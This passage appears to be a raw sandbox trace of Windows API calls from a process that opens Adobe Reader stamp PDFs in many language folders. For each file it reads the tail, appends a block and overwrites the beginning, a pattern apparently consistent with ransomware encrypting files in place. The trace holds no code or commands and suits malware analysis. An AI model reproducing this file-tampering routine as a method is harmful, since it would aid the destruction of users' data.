lpOverlapped=0x0) returned 1 [0065.000] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x20a02 [0065.001] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.001] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x20a02 [0065.002] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.002] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.002] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0065.002] CloseHandle (hObject=0x1bc) returned 1 [0065.012] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.013] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.013] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb731 [0065.013] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.013] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.013] ReleaseMutex (hMutex=0x168) returned 1 [0065.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.013] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.141] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa731 [0065.141] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.143] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa731 [0065.163] WriteFile (in: hFile=0x1bc, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.171] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.171] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.171] CloseHandle (hObject=0x1bc) returned 1 [0065.181] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\Hanko.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\hanko.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.182] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.182] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xffc9 [0065.182] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.182] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.182] ReleaseMutex (hMutex=0x168) returned 1 [0065.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hanko.pdf", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0065.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Hanko.pdf", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Hanko.pdf", lpUsedDefaultChar=0x0) returned 9 [0065.182] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.186] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xefc9 [0065.186] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.188] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xefc9 [0065.189] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.190] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.190] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.190] CloseHandle (hObject=0x1bc) returned 1 [0065.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NLD\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nld\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.192] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.192] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x9542 [0065.192] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.192] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.192] ReleaseMutex (hMutex=0x168) returned 1 [0065.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.192] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.193] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.196] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x8542 [0065.196] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.197] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x8542 [0065.197] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.197] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.198] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.198] CloseHandle (hObject=0x1bc) returned 1 [0065.205] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.206] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.206] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4fff9 [0065.206] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.206] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.206] ReleaseMutex (hMutex=0x168) returned 1 [0065.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.207] ReadFile (in: hFile=0x1bc, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0065.527] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4eff9 [0065.527] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.531] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x4eff9 [0065.531] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea5288*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5288*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.532] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.532] WriteFile (in: hFile=0x1bc, lpBuffer=0x28930e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x28930e8*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0065.532] CloseHandle (hObject=0x1bc) returned 1 [0065.544] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.545] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.545] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb731 [0065.545] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.545] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.545] ReleaseMutex (hMutex=0x168) returned 1 [0065.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7320c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.545] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ea5288, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5288*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.548] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa731 [0065.548] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.548] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa731 [0065.549] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.549] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.549] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.549] CloseHandle (hObject=0x1bc) returned 1 [0065.553] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rus\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.553] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.553] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1c4f5 [0065.553] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.553] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.553] ReleaseMutex (hMutex=0x168) returned 1 [0065.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0065.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0065.554] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ea5288, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5288*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.556] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1b4f5 [0065.556] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.569] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1b4f5 [0065.570] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.571] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.571] WriteFile (in: hFile=0x1bc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.572] CloseHandle (hObject=0x1bc) returned 1 [0065.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\slv\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.580] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.580] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1e146 [0065.580] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.580] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0065.580] ReleaseMutex (hMutex=0x168) returned 1 [0065.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0065.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f733cc, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0065.581] ReadFile (in: hFile=0x1bc, lpBuffer=0x1ea5288, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea5288*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0065.735] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1d146 [0065.735] ReadFile (in: hFile=0x1bc, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0065.736] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1d146 [0065.736] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0065.737] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0065.737] WriteFile (in: hFile=0x1bc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0065.737] CloseHandle (hObject=0x1bc) returned 1 [0065.749] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\suo\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0065.750] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0065.750] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x16f99 [0065.750] SetFilePointer (in: 